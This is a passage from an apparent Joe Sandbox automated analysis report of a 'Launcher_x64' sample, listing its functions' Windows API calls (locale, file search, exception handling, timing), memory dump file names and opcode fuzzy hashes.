                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D284E7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00D28525
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00D28538
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D28580
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D2859B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction ID: b73c5bf5b4ac5ed6c15cc3fada67feb6a38e569b31b43dc761ded1df80da9332
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70518371901226AFDB20EFA4EC41ABE77B9FF64708F084469E910E7150DB74DA41DB71
                                                                                                                                                                                                                                                                                        Function 00D21250 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction ID: 93956f05759d0228050c6224d6f0c7fefcf0d186ad30724eb730d88210f7296c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75022E75E012299FDF14CFA9D8806ADBBF1FF68318F288269D515E7341D731A941CBA0
                                                                                                                                                                                                                                                                                        Function 00D29126 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D29216
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00D2930A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00D29349
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00D2937C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b5e4fbd77f773d1a72858af2971487797b3acee2252fda4b716ea46fbb8c914c
                                                                                                                                                                                                                                                                                        • Instruction ID: 5dcd67216c9ded77c8a77d96c9f4446fe3e92ab7aa58dd3b0a890a4f3e6c26df
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5e4fbd77f773d1a72858af2971487797b3acee2252fda4b716ea46fbb8c914c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D071E671804279AFDF21EF24ACA9AEAF7B9EF15308F1841D9E04D97251DA305E858F34
                                                                                                                                                                                                                                                                                        Function 00D16528 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D16534
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00D16600
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D16619
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D16623
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction ID: 76953300afc11c3ee55e77bd50c8f9b1db3081ab984a1f2dfd0fa11dce8a27b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d004db1e1d530777ec3803eb55d07cc919aa30f5de151e9104138384e85f543
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC31F675D05318ABDB20DFA4E9497CDBBB8BF08304F1041EAE40CAB250EB709A85CF65
                                                                                                                                                                                                                                                                                        Function 00D17110 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D17122
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D17131
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00D1713A
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00D17147
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c949e7e007648ac5ef534950dae326d8d32433d89021921dba2622549929ba6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c27f80bb6f2cab2fd8ab1a092a2bf70921794c19c142f66447fd2c8101773303
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF05F74D1120DEBCB00DBB4DA8999EBBF5EF1C200B914996A412E7210E630AB44DF61
                                                                                                                                                                                                                                                                                        Function 00D286CB Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D2871F
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D28769
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D2882F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 661929714-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd226d64f9cb752375b2d33e86bb6672e93f4dd8d13ef944eeff277fb9135f56
                                                                                                                                                                                                                                                                                        • Instruction ID: 52ab9fcf0452e0b6894172f15efe28a469e643012b7007287ad91d160e4e08c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd226d64f9cb752375b2d33e86bb6672e93f4dd8d13ef944eeff277fb9135f56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E61B7715012279FEB289F24EC82B7AB7A9EF24308F584079ED05C6181EB74DD91EB70
                                                                                                                                                                                                                                                                                        Function 00D1F2B0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D1F3A8
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D1F3B2
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D1F3BF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6f36b9d05ecfffedc7472f79a0a87d3026b484acb87f8cb4ae07ad8d8281ab1a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8ce1be63655f99d1bacbc62888445281a7c2f5e5949872843ca7a4beb1815a87
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f36b9d05ecfffedc7472f79a0a87d3026b484acb87f8cb4ae07ad8d8281ab1a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F531A475911318ABCB21DF64E8897DDBBB8FF08310F5041EAE41CA7251EB749B858F64
                                                                                                                                                                                                                                                                                        Function 00D2CD97 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D2CCF2,?,?,00000008,?,?,00D3318B,00000000), ref: 00D2CFC4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2992b74c17b7204ea7d4e172cd411fdb601183b7fd026391a07bcea60435a4c2
                                                                                                                                                                                                                                                                                        • Instruction ID: 84d916510f747a357a084922619cb105df35caeae1c0ef8f745696d4e34fc7cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2992b74c17b7204ea7d4e172cd411fdb601183b7fd026391a07bcea60435a4c2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B16B311206189FD714CF28D58AB687BE1FF55368F298658E8D9CF2A1C335DD82CB50
                                                                                                                                                                                                                                                                                        Function 00D16194 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D161AA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 53ebe6c7dfbe22c23cc4de559845853e30607d2c3e073ff4ef2cc183f04d5798
                                                                                                                                                                                                                                                                                        • Instruction ID: edb252e968e911e30e71130b4409ba25fc22c63ab6ecbb49bb7bea1c5c566bf4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53ebe6c7dfbe22c23cc4de559845853e30607d2c3e073ff4ef2cc183f04d5798
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFA16EB9D057059FDB18CF58E8916A9BBF1FB49328F28812AD511E7360D734A880CFA1
                                                                                                                                                                                                                                                                                        Function 00D1C040 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ae0f78073da5d7b7f3e754ce0f03405a8c0c10643814b826e17a75fc474c9c4
                                                                                                                                                                                                                                                                                        • Instruction ID: 8490eef3900030a18e7fd1fd82970c9ccf3bc4ffaf9751d1f6d502a5d61a0521
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ae0f78073da5d7b7f3e754ce0f03405a8c0c10643814b826e17a75fc474c9c4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC1D1749A0706BFCB24CFA8E4846FAB7B1EF09310F186619D49297652CB31E9C5CB71
                                                                                                                                                                                                                                                                                        Function 00D2897D Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D289D1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c86ac0f65adcfe469dc823ba5626e541995c9291179e98c65dff5bbb9a177cd
                                                                                                                                                                                                                                                                                        • Instruction ID: 39a45f6103afa1de8b1c416ec6c79e68a7a88d6f47228474a63d90642c9e555a
